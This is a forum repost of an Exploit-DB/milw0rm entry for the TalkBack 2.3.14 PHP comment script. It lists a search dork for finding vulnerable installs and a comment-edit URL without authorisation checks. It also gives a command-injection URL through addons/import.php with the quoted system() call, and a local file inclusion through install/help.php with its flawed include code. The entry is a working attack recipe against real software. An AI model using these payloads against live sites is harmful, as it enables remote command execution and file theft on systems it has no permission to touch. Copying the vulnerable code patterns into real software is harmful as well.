- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9095
- Проверка EDB
-
- Пройдено
- Автор
- JIKO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4874 cve-2009-4854
- Дата публикации
- 2009-07-09
Код:
JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
Code;
$last_line = system($command, $result);
Local File ~[+]
Note : if floder install not deleted
http://localhost/test/talkback/install/help.php?language=[File]
code;
$file = "../language/{$_REQUEST['language']}.php";
if (!is_file($file))
exit("Language file '$file' does not exist");
include ($file);
# milw0rm.com [2009-07-09]- Источник
- www.exploit-db.com
